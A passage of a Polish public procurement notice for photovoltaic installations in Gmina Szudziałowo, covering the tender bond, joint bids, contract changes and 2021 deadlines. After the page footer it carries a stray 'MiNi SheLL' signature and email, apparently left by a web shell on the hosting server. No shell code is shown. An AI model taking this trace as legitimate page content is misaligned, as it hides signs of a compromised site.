pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego<br/>zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o<br/>których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby<br/>złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy. 5) Pełnomocnictwo do reprezentowania wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy).6) Dowód wpłacenia wadium.7) Dokumenty potwierdzające okresy gwarancji<br/>producenta konstrukcji wsporczych, paneli fotowoltaicznych i inwerterów8) Karty katalogowe<br/>materiałów wykorzystywanych do budowy instalacji fotowoltaicznych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 5.000,00 PLN (słownie: pięć<br/>tysięcy zł),12.2. Wadium może być wniesione w jednej lub kilku następujących formach:a)<br/>pieniądzu;b) gwarancjach bankowych;c) gwarancjach ubezpieczeniowych;d) poręczeniach<br/>udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.12.3. Wadium wnoszone w<br/>pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego w<br/>Banku Spółdzielczym O/Sokółka 14 8093 0000 0020 0107 2000 0030 z dopiskiem „Dostawa i<br/>montaż instalacji fotowoltaicznych na potrzeby Gminy Szudziałowo” przed upływem terminu<br/>składania ofert, a dowód wpłacenia wadium dołączyć do oferty. 12.4. Za skuteczne wniesienie<br/>wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku<br/>bankowym Zamawiającego przed upływem terminu składania ofert.12.5. Jeżeli wadium jest<br/>wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania<br/>ofert.12.6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej,<br/>lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i<br/>powinna zawierać następujące elementy:a) nazwę: dającego zlecenie (Wykonawcy),<br/>beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie<br/>ich siedzib,b) kwotę wadium,c) termin ważności gwarancji/poręczenia w formule: „od dnia …….–do dnia ………”,d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w<br/>gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium<br/>określonych w przepisach ustawy.12.7. Wadium wnosi się przed upływem terminu składania<br/>ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem<br/>przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.12.8. Zasady<br/>dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców lub w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być dołączone pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenie o którym mowa w pkt. 8.1.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.4 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.4.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.1 Projekt Umowy stanowi Załącznik Nr 8 do SWZ.21.2 Zamawiający przewiduje możliwości<br/>wprowadzenia zmian do zawartej umowy, zgodnie z postanowieniami Projektu Umowy.<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnej na miniPortalu i udostępnionego również na ePUAP. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> określono w rozdziale 24.Maksymalny termin realizacji zamówienia nie później niż do 29.10.2021</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com